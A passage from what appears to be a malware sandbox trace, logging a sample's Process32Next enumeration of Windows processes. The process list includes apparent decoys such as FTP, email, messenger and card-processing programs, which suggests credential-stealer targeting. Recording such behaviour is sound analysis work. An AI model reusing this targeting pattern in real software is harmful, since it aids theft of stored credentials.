Process]")) returned 1 [0160.736] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0160.738] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0160.739] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0160.741] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0160.743] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0160.744] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0160.746] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0160.748] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0160.750] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.752] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.753] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0160.755] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.804] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.806] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.809] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.810] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.812] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.814] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.815] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0160.817] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0160.819] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0160.821] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0160.823] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.824] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0160.826] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0160.828] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0160.830] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0160.832] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0160.834] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0160.835] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.837] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0160.864] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0160.866] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0160.868] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0160.870] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.872] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0160.874] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0160.876] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0160.878] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0160.880] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0160.883] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0160.884] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0160.886] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0160.888] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0160.889] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0160.891] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0160.893] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0160.894] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0160.896] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0160.899] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0160.906] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0160.909] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0160.911] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0160.914] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0160.916] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0160.919] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0160.921] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0160.938] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0160.941] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0160.944] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0160.947] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0160.950] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0160.953] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0160.962] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0160.965] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0160.969] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0160.972] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0160.974] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0160.978] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0160.982] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0160.985] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0160.988] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0160.991] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0160.993] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0160.999] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0161.002] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0161.005] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0161.007] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0161.010] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0161.013] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0161.015] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0161.018] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0161.021] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0161.024] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0161.027] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, 